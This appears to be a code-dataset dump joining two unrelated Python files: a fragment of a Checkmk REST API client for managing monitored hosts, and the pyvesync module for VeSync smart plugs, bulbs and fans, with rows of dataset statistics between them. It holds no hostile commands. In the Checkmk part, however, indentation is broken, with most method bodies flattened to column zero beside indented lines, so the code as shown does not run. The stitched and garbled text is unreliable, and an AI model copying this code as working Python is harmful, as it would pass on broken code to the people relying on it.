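    #           folder.output(1)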
#GET /objects/folder_config/{folder}/collections/hosts Show all hosts in a folder
#folder string - The path of the folder being requested. Please be aware that slashes can't be used in the URL. Also, escaping the slashes via %2f will not work. Please replace the path delimiters with the tilde character ~. Path delimiters can be either ~, / or \. Please use the one most appropriate for your quoting/escaping needs. A good default choice is ~.
def show_all_hosts(self,folder,send=True,display_req=False,display_res=False):
if (folder == None):
raise ValueError('folder cannot be none')
#/domain-types/folder_config/collections/all?parent=~&recursive=false&show_hosts=false
res = self.exec(f'/objects/folder_config/{folder}/collections/hosts',send=send,display_req=display_req,display_res=display_res)
if (res == None):
print('Response is None')
else:
# HTTP 200 OK
if (res.status_code == 200):
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
id = json_dmp['id']
domainType = json_dmp['domainType']
value = json_dmp['value']
response_header = res.headers
hosts = []
for i in value:
value_id = i['id']
cmk_host = Host(value_id)
cmk_host.set_using_json(i)
hosts.append(cmk_host)
return hosts
else:
return None
return None
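    # Usage sketch (hypothetical folder path, ~ meaning the root folder):
    #   hosts = cmk.show_all_hosts('~')
    #   if hosts is not None:
    #       for h in hosts:
    #           print(h.id)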
# POST /objects/host/{host_name}/actions/discover_services/invoke Execute a service discovery on a host
def discover_services(self,host,mode,send=True,display_req=False,display_res=False):
        #If object of class Host
        if isinstance(host, Host):
            if host.id is None or host.folder is None:
                raise ValueError('Empty id or folder is not allowed')
            host_name = host.id
        #If string
        elif isinstance(host, str):
            host_name = host
        else:
            #Previously host_name stayed unbound for any other type
            raise TypeError('host must be a Host object or a host name string')
        # one of the enum values: ['new', 'remove', 'fix_all', 'refresh', 'only_host_labels']
        if mode not in ('new', 'remove', 'fix_all', 'refresh', 'only_host_labels'):
            raise ValueError("Mode has to be one of 'new', 'remove', 'fix_all', 'refresh' or 'only_host_labels'")
#Build json
base = {}
base['mode'] = mode
base_data = js.dumps(base)
res = self.exec(f'/objects/host/{host_name}/actions/discover_services/invoke',req_type='POST',data=base_data,send=send,display_req=display_req,display_res=display_res)
if (res == None):
print('Response is None')
else:
# HTTP 200 OK
if (res.status_code == 200):
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
title = json_dmp['title']
id = json_dmp['id']
domain_type = json_dmp['domainType']
members = json_dmp['members']
extensions = json_dmp['extensions']
response_header = res.headers
ok = Discover_ok(title,response_header,id,domain_type,members,extensions)
return Discover(res.status_code, ok)
else:
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
title = json_dmp['title']
status = json_dmp['status']
detail = json_dmp['detail']
response_header = res.headers
fail = Discover_fail(title,response_header,status,detail)
return Discover(res.status_code, fail)
return None
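    # Usage sketch (hypothetical host name; mode must be one of the values
    # validated above, e.g. 'fix_all' to add missing and remove vanished services):
    #   reply = cmk.discover_services('myhost', 'fix_all')
    #   if reply is not None and reply.status_code == 200:
    #       print('discovery started')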
# POST /domain-types/activation_run/actions/activate-changes/invoke Activate pending changes
def activate_changes(self,force_foreign_changes=False,send=True,display_req=False,display_res=False):
        site = self.site_name
        #Build the request body via json.dumps instead of manual string
        #interpolation; the payload is identical (one site, boolean flag).
        data = js.dumps({
            'redirect': False,
            'sites': [site],
            'force_foreign_changes': bool(force_foreign_changes),
        })
res = self.exec(f'/domain-types/activation_run/actions/activate-changes/invoke',req_type='POST',data=data,send=send,display_req=display_req,display_res=display_res)
if (res == None):
print('Response is None')
else:
# HTTP 200 OK
if (res.status_code == 200):
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
title = json_dmp['title']
id = json_dmp['id']
domain_type = json_dmp['domainType']
members = json_dmp['members']
extensions = json_dmp['extensions']
response_header = res.headers
ok = Changes_ok(title,response_header,id,domain_type,members,extensions)
return Change(res.status_code, ok)
else:
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
title = json_dmp['title']
status = json_dmp['status']
detail = json_dmp['detail']
response_header = res.headers
fail = Changes_fail(title,response_header,status,detail)
return Change(res.status_code, fail)
return None
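    # Usage sketch: a typical edit cycle ends by activating the pending changes
    # on the site passed to the constructor (hypothetical host and address):
    #   cmk.update_host_ipaddress('myhost', '192.168.0.42')
    #   cmk.activate_changes(force_foreign_changes=False)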
# PUT /objects/host_config/{host_name} Update a host
# Update a checkmk host with request body (data) as variable
# Host etag is a value that changes on every modification
#
# Examples for function parameter data:
#
# Change checkmk host parameter (don't change other parameters):
# {"update_attributes": {"tag_pumpa": "bs0050"}}
#
# Change all checkmk host parameters (any parameters not defined in body will be cleared)
# {"attributes": {"ipaddress": "192.168.0.6"}}
#
# Remove checkmk parameter (don't change other parameters):
# {"remove_attributes": ["tag_pumpa_type"]}
def update_host(self,host,data,etag,send=True,display_req=False,display_res=False):
        #If object of class Host
        if isinstance(host, Host):
            if host.id is None or host.folder is None:
                raise ValueError('Empty id or folder is not allowed')
            hostname = host.id
        #If string
        elif isinstance(host, str):
            hostname = host
        else:
            raise TypeError('host must be a Host object or a host name string')
#Modify header to contain etag
header = {}
header['accept'] = 'application/json'
header['If-Match'] = etag
header['Content-Type'] = 'application/json'
res = self.exec(f'/objects/host_config/{hostname}',req_type='PUT',data=data,send=send,display_req=display_req,display_res=display_res,header=header)
if (res == None):
print('Response is None')
else:
# HTTP 200 OK
if (res.status_code == 200):
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
title = json_dmp['title']
id = json_dmp['id']
domain_type = json_dmp['domainType']
members = json_dmp['members']
extensions = json_dmp['extensions']
response_header = res.headers
                ok = Update_ok(title,response_header,id,domain_type,members,extensions)
                return Update(res.status_code, ok)
else:
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
title = json_dmp['title']
status = json_dmp['status']
detail = json_dmp['detail']
response_header = res.headers
                fail = Update_fail(title,response_header,status,detail)
                return Update(res.status_code, fail)
return None
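    # Usage sketch tying get_etag() (defined below) to the documented request
    # bodies (hypothetical host and tag group):
    #   etag = cmk.get_etag('myhost')
    #   body = js.dumps({'update_attributes': {'tag_pumpa': 'bs0050'}})
    #   reply = cmk.update_host('myhost', body, etag)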
# PUT /objects/host_config/{host_name} Update a host
# Remove tag group from host
def remove_host_tag(self,host,tag_group,send=True,display_req=False,display_res=False):
        #If object of class Host
        if isinstance(host, Host):
            if host.id is None or host.folder is None:
                raise ValueError('Empty id or folder is not allowed')
            hostname = host.id
        #If string
        elif isinstance(host, str):
            hostname = host
        else:
            raise TypeError('host must be a Host object or a host name string')
if (tag_group == None):
raise ValueError('tag_group cannot be None')
# Define web service data
data = {}
data['remove_attributes'] = [ tag_group, ]
data = js.dumps(data)
#Get host etag (value that changes on every modification)
etag = self.get_etag(hostname)
#Call generic update call with our specific data and etag
return self.update_host(hostname,data,etag,send,display_req,display_res)
# PUT /objects/host_config/{host_name} Update a host
# Update (set new or update existing) tag
def update_host_tag(self,host,tag_group,tag_group_value,send=True,display_req=False,display_res=False):
        #If object of class Host
        if isinstance(host, Host):
            if host.id is None or host.folder is None:
                raise ValueError('Empty id or folder is not allowed')
            hostname = host.id
        #If string
        elif isinstance(host, str):
            hostname = host
        else:
            raise TypeError('host must be a Host object or a host name string')
if (tag_group == None or tag_group_value == None):
raise ValueError('tag_group or tag_group_value cannot be None')
# Define web service data
data = {}
data['update_attributes'] = {}
data['update_attributes'][tag_group] = tag_group_value
data = js.dumps(data)
#Get host etag (value that changes on every modification)
etag = self.get_etag(hostname)
#Call generic update call with our specific data and etag
return self.update_host(hostname,data,etag,send,display_req,display_res)
# PUT /objects/host_config/{host_name} Update a host
# Remove ipaddress (resolve ip from hostname)
def remove_host_ipaddress(self,host,send=True,display_req=False,display_res=False):
        #If object of class Host
        if isinstance(host, Host):
            if host.id is None or host.folder is None:
                raise ValueError('Empty id or folder is not allowed')
            hostname = host.id
        #If string
        elif isinstance(host, str):
            hostname = host
        else:
            raise TypeError('host must be a Host object or a host name string')
# Define web service data
data = {}
data['remove_attributes'] = [ 'ipaddress', ]
data = js.dumps(data)
#Get host etag (value that changes on every modification)
etag = self.get_etag(hostname)
#Call generic update call with our specific data and etag
return self.update_host(hostname,data,etag,send,display_req,display_res)
# PUT /objects/host_config/{host_name} Update a host
# Update (set new or update existing) ipaddress
def update_host_ipaddress(self,host,ipaddress,send=True,display_req=False,display_res=False):
        #If object of class Host
        if isinstance(host, Host):
            if host.id is None or host.folder is None:
                raise ValueError('Empty id or folder is not allowed')
            hostname = host.id
        #If string
        elif isinstance(host, str):
            hostname = host
        else:
            raise TypeError('host must be a Host object or a host name string')
if (ipaddress == None):
raise ValueError('ipaddress cannot be None')
# Define web service data
data = {}
data['update_attributes'] = {}
data['update_attributes']['ipaddress'] = ipaddress
data = js.dumps(data)
#Get host etag (value that changes on every modification)
etag = self.get_etag(hostname)
#Call generic update call with our specific data and etag
return self.update_host(hostname,data,etag,send,display_req,display_res)
#Get host etag (value that changes on every modification)
def get_etag(self,host):
        #If object of class Host
        if isinstance(host, Host):
            if host.id is None or host.folder is None:
                raise ValueError('Empty id or folder is not allowed')
            hostname = host.id
        #If string
        elif isinstance(host, str):
            hostname = host
        else:
            raise TypeError('host must be a Host object or a host name string')
#Get host data
host1 = self.host_get(hostname,effective_attributes=True,send=True,display_req=False,display_res=False)
#If hostname was found we also got etag value
if (host1 != None):
etag = host1[1]
return etag
else:
#Return empty string so that subsequent REST calls are going to get status 404
return ''
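    # The ETag gives optimistic locking: if the host is modified between
    # get_etag() and a subsequent PUT, the stale If-Match header makes the API
    # reject the update. Usage sketch (hypothetical host name):
    #   etag = cmk.get_etag('myhost')
    #   cmk.update_host('myhost', js.dumps({'remove_attributes': ['tag_pumpa']}), etag)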
# POST /domain-types/host_config/collections/all Create a host
def create_host(self,host,send=True,display_req=False,display_res=False):
if (host == None or host.id == None or host.folder == None):
raise ValueError('Empty id or folder is not allowed')
#Build json
base = {}
#base['id'] = host.id #rest doesn't accept id
#base['title'] = host.title #rest doesn't accept title
base['host_name'] = host.id
base['folder'] = host.folder
if (host.ipaddress != None or host.alias != None):
attributes = {}
if (host.ipaddress != None):
attributes['ipaddress'] = host.ipaddress
if (host.alias != None):
attributes['alias'] = host.alias
#Add attributes to base in json
base['attributes'] = attributes
        #Only show the request body when request display is requested
        if (display_req == True):
            print('base:')
            print(js.dumps(base, indent=4))
res = self.exec(f'/domain-types/host_config/collections/all',req_type='POST',data=js.dumps(base),send=send,display_req=display_req,display_res=display_res)
if (res == None):
print('Response is None')
else:
# HTTP 200 OK
if (res.status_code == 200):
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
title = json_dmp['title']
id = json_dmp['id']
domain_type = json_dmp['domainType']
members = json_dmp['members']
extensions = json_dmp['extensions']
response_header = res.headers
ok = Create_ok(title,response_header,id,domain_type,members,extensions)
return Create(res.status_code, ok)
else:
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
title = json_dmp['title']
status = json_dmp['status']
detail = json_dmp['detail']
fields = json_dmp['fields']
response_header = res.headers
fail = Create_fail(title,response_header,status,detail,fields)
return Create(res.status_code, fail)
return None
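    # Usage sketch (hypothetical host; assumes the Host class allows setting
    # folder/ipaddress/alias after construction, since create_host reads them):
    #   new_host = Host('myhost')
    #   new_host.folder = '~linux'
    #   new_host.ipaddress = '192.168.0.123'
    #   reply = cmk.create_host(new_host)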
# DELETE /objects/host_config/{host_name} Delete a host
def delete_host(self,host,send=True,display_req=False,display_res=False):
if (host == None or host.id == None or host.folder == None):
raise ValueError('Empty id or folder is not allowed')
res = self.exec(f'/objects/host_config/{host.id}',req_type='DELETE',data=None,send=send,display_req=display_req,display_res=display_res)
if (res == None):
print('Response is None')
else:
# HTTP 204 (No Content: Operation done successfully. No further output.)
if (res.status_code == 204):
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
title = ''
response_header = ''
if (len(cont) == 0):
title = '204 No Content: Operation done successfully. No further output.'
response_header = res.headers
else:
                    raise ValueError('Unexpected response body for HTTP 204 No Content')
ok = Delete_ok(title,response_header)
return Delete(res.status_code, ok)
else:
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
title = json_dmp['title']
status = json_dmp['status']
detail = json_dmp['detail']
fields = json_dmp['fields']
response_header = res.headers
fail = Delete_fail(title,response_header,status,detail,fields)
return Delete(res.status_code, fail)
return None
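# Minimal end-to-end sketch, runnable as a script. URL, CA bundle path and
# credentials are hypothetical placeholders and must be replaced.
if __name__ == '__main__':
    cmk = Checkmk(
        'https://cmk.example.com/mysite/check_mk/api/1.0',  # hypothetical API base URL
        '/etc/ssl/certs/ca.pem',                            # hypothetical CA bundle
        ('automation', 'mysecret123'),                      # hypothetical bearer credentials
        'mysite',
    )
    all_hosts = cmk.host_get_all()
    if all_hosts is not None:
        for h in all_hosts:
            print(h.id)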
| 37.590028 | 366 | 0.51383 | 4,402 | 40,710 | 4.614721 | 0.087233 | 0.031702 | 0.017919 | 0.0159 | 0.645269 | 0.614699 | 0.570592 | 0.555134 | 0.527223 | 0.495127 | 0 | 0.008081 | 0.352542 | 40,710 | 1,082 | 367 | 37.624769 | 0.762615 | 0.308892 | 0 | 0.517564 | 0 | 0.002342 | 0.097364 | 0.022854 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044496 | false | 0 | 0.025761 | 0.004684 | 0.152225 | 0.0726 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a87d783d0d8d9218226e9274f60f229d28223902 | 11,287 | py | Python | src/pyvesync/vesync.py | RedbeardWally/pyvesync | c41eb8a77e68cc357f558e4fa413e42f9ba68658 | [
"MIT"
] | null | null | null | src/pyvesync/vesync.py | RedbeardWally/pyvesync | c41eb8a77e68cc357f558e4fa413e42f9ba68658 | [
"MIT"
] | null | null | null | src/pyvesync/vesync.py | RedbeardWally/pyvesync | c41eb8a77e68cc357f558e4fa413e42f9ba68658 | [
"MIT"
] | null | null | null | """VeSync API Device Libary."""
import logging
import re
import time
from itertools import chain
from typing import Tuple
from pyvesync.helpers import Helpers
from pyvesync.vesyncbasedevice import VeSyncBaseDevice
from pyvesync.vesyncbulb import * # noqa: F403, F401
import pyvesync.vesyncbulb as bulb_mods
from pyvesync.vesyncfan import * # noqa: F403, F401
import pyvesync.vesyncfan as fan_mods
from pyvesync.vesyncoutlet import * # noqa: F403, F401
import pyvesync.vesyncoutlet as outlet_mods
from pyvesync.vesyncswitch import * # noqa: F403, F401
import pyvesync.vesyncswitch as switch_mods
logger = logging.getLogger(__name__)
API_RATE_LIMIT: int = 30
DEFAULT_TZ: str = 'America/New_York'
DEFAULT_ENER_UP_INT: int = 21600
def object_factory(dev_type, config, manager) -> Tuple[str, VeSyncBaseDevice]:
"""Get device type and instantiate class."""
def fans(dev_type, config, manager):
fan_cls = fan_mods.fan_modules[dev_type] # noqa: F405
fan_obj = getattr(fan_mods, fan_cls)
return 'fans', fan_obj(config, manager)
def outlets(dev_type, config, manager):
outlet_cls = outlet_mods.outlet_modules[dev_type] # noqa: F405
outlet_obj = getattr(outlet_mods, outlet_cls)
return 'outlets', outlet_obj(config, manager)
def switches(dev_type, config, manager):
switch_cls = switch_mods.switch_modules[dev_type] # noqa: F405
switch_obj = getattr(switch_mods, switch_cls)
return 'switches', switch_obj(config, manager)
def bulbs(dev_type, config, manager):
bulb_cls = bulb_mods.bulb_modules[dev_type] # noqa: F405
bulb_obj = getattr(bulb_mods, bulb_cls)
return 'bulbs', bulb_obj(config, manager)
if dev_type in fan_mods.fan_modules: # type: ignore # noqa: F405
type_str, dev_obj = fans(dev_type, config, manager)
elif dev_type in outlet_mods.outlet_modules: # type: ignore # noqa: F405
type_str, dev_obj = outlets(dev_type, config, manager)
elif dev_type in switch_mods.switch_modules: # type: ignore # noqa: F405
type_str, dev_obj = switches(dev_type, config, manager)
elif dev_type in bulb_mods.bulb_modules: # type: ignore # noqa: F405
type_str, dev_obj = bulbs(dev_type, config, manager)
else:
logger.debug('Unknown device named %s model %s',
config.get('deviceName', ''),
config.get('deviceType', '')
)
type_str = 'unknown'
dev_obj = None
return type_str, dev_obj
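# Illustration of the dispatch above (device type and config are hypothetical;
# a real call passes the full device dict returned by the VeSync API):
#   type_str, dev = object_factory('ESL100', device_config, manager)
#   if dev is not None:
#       getattr(manager, type_str).append(dev)  # e.g. manager.bulbs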
class VeSync: # pylint: disable=function-redefined
"""VeSync API functions."""
def __init__(self, username, password, time_zone=DEFAULT_TZ, debug=False):
"""Initialize VeSync class with username, password and time zone."""
self.debug = debug
if debug:
logger.setLevel(logging.DEBUG)
self.username = username
self.password = password
self.token = None
self.account_id = None
self.devices = None
self.enabled = False
self.update_interval = API_RATE_LIMIT
self.last_update_ts = None
self.in_process = False
self._energy_update_interval = DEFAULT_ENER_UP_INT
self._energy_check = True
self.outlets = []
self.switches = []
self.fans = []
self.bulbs = []
self.scales = []
self._dev_list = {
'fans': self.fans,
'outlets': self.outlets,
'switches': self.switches,
'bulbs': self.bulbs
}
if isinstance(time_zone, str) and time_zone:
reg_test = r'[^a-zA-Z/_]'
if bool(re.search(reg_test, time_zone)):
self.time_zone = DEFAULT_TZ
logger.debug('Invalid characters in time zone - %s',
time_zone)
else:
self.time_zone = time_zone
else:
self.time_zone = DEFAULT_TZ
logger.debug('Time zone is not a string')
@property
def energy_update_interval(self) -> int:
"""Return energy update interval."""
return self._energy_update_interval
@energy_update_interval.setter
def energy_update_interval(self, new_energy_update: int) -> None:
"""Set energy update interval in seconds."""
if new_energy_update > 0:
self._energy_update_interval = new_energy_update
@staticmethod
def remove_dev_test(device, new_list: list) -> bool:
"""Test if device should be removed - False = Remove."""
if isinstance(new_list, list) and device.cid:
for item in new_list:
device_found = False
if 'cid' in item:
if device.cid == item['cid']:
device_found = True
break
else:
logger.debug('No cid found in - %s', str(item))
if not device_found:
logger.debug(
'Device removed - %s - %s',
device.device_name, device.device_type
)
return False
return True
def add_dev_test(self, new_dev: dict) -> bool:
"""Test if new device should be added - True = Add."""
if 'cid' in new_dev:
for _, v in self._dev_list.items():
for dev in v:
if (
dev.cid == new_dev.get('cid')
and new_dev.get('subDeviceNo', 0) == dev.sub_device_no
):
return False
return True
def remove_old_devices(self, devices: list) -> bool:
"""Remove devices not found in device list return."""
for k, v in self._dev_list.items():
before = len(v)
v[:] = [x for x in v if self.remove_dev_test(x, devices)]
after = len(v)
if before != after:
logger.debug('%s %s removed', str((before - after)), k)
return True
@staticmethod
def set_dev_id(devices: list) -> list:
"""Correct devices without cid or uuid."""
dev_num = 0
dev_rem = []
for dev in devices:
if dev.get('cid') is None:
if dev.get('macID') is not None:
dev['cid'] = dev['macID']
elif dev.get('uuid') is not None:
dev['cid'] = dev['uuid']
else:
dev_rem.append(dev_num)
logger.warning('Device with no ID - %s',
dev.get('deviceName'))
dev_num += 1
if dev_rem:
devices = [i for j, i in enumerate(
devices) if j not in dev_rem]
return devices
def process_devices(self, dev_list: list) -> bool:
"""Instantiate Device Objects."""
devices = VeSync.set_dev_id(dev_list)
num_devices = 0
for _, v in self._dev_list.items():
if isinstance(v, list):
num_devices += len(v)
else:
num_devices += 1
if not devices:
logger.warning('No devices found in api return')
return False
if num_devices == 0:
logger.debug('New device list initialized')
else:
self.remove_old_devices(devices)
devices[:] = [x for x in devices if self.add_dev_test(x)]
detail_keys = ['deviceType', 'deviceName', 'deviceStatus']
for dev in devices:
if not all(k in dev for k in detail_keys):
logger.debug('Error adding device')
continue
dev_type = dev.get('deviceType')
try:
device_str, device_obj = object_factory(dev_type, dev, self)
device_list = getattr(self, device_str)
device_list.append(device_obj)
except AttributeError as err:
logger.debug('Error - %s', err)
logger.debug('%s device not added', dev_type)
continue
return True
def get_devices(self) -> bool:
"""Return tuple listing outlets, switches, and fans of devices."""
if not self.enabled:
return False
self.in_process = True
proc_return = False
response, _ = Helpers.call_api(
'/cloud/v1/deviceManaged/devices',
'post',
headers=Helpers.req_headers(self),
json=Helpers.req_body(self, 'devicelist'),
)
if response and Helpers.code_check(response):
if 'result' in response and 'list' in response['result']:
device_list = response['result']['list']
if self.debug:
logger.debug(str(device_list))
proc_return = self.process_devices(device_list)
else:
logger.error('Device list in response not found')
else:
logger.warning('Error retrieving device list')
self.in_process = False
return proc_return
def login(self) -> bool:
"""Return True if log in request succeeds."""
user_check = isinstance(self.username, str) and len(self.username) > 0
pass_check = isinstance(self.password, str) and len(self.password) > 0
if user_check is False:
logger.error('Username invalid')
return False
if pass_check is False:
logger.error('Password invalid')
return False
response, _ = Helpers.call_api(
'/cloud/v1/user/login', 'post',
json=Helpers.req_body(self, 'login')
)
if Helpers.code_check(response) and 'result' in response:
self.token = response.get('result').get('token')
self.account_id = response.get('result').get('accountID')
self.enabled = True
return True
logger.error('Error logging in with username and password')
return False
def device_time_check(self) -> bool:
"""Test if update interval has been exceeded."""
if (
self.last_update_ts is None
or (time.time() - self.last_update_ts) > self.update_interval
):
return True
return False
def update(self) -> None:
"""Fetch updated information about devices."""
if self.device_time_check():
if not self.enabled:
logger.error('Not logged in to VeSync')
return
self.get_devices()
devices = list(self._dev_list.values())
for device in chain(*devices):
device.update()
self.last_update_ts = time.time()
def update_energy(self, bypass_check=False) -> None:
"""Fetch updated energy information about devices."""
if self.outlets:
for outlet in self.outlets:
outlet.update_energy(bypass_check)
    def update_all_devices(self) -> None:
        """Run get_details() for each device."""
        # Chain over the device lists themselves; iterating over .keys() would
        # chain the key strings character by character.
        devices = list(self._dev_list.values())
        for dev in chain(*devices):
            dev.get_details()
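# Minimal usage sketch, runnable as a script; the credentials are hypothetical
# placeholders. device_name/device_status are attributes assumed to be provided
# by VeSyncBaseDevice.
if __name__ == '__main__':
    manager = VeSync('user@example.com', 'password', time_zone=DEFAULT_TZ)
    if manager.login():
        manager.update()
        for outlet in manager.outlets:
            print(outlet.device_name, outlet.device_status)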
| 35.94586 | 78 | 0.57234 | 1,343 | 11,287 | 4.624721 | 0.160089 | 0.022541 | 0.018838 | 0.028981 | 0.196748 | 0.105941 | 0.070681 | 0.053293 | 0.024473 | 0 | 0 | 0.008753 | 0.331975 | 11,287 | 313 | 79 | 36.060703 | 0.814987 | 0.084345 | 0 | 0.170635 | 0 | 0 | 0.07554 | 0.003029 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075397 | false | 0.031746 | 0.059524 | 0 | 0.230159 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |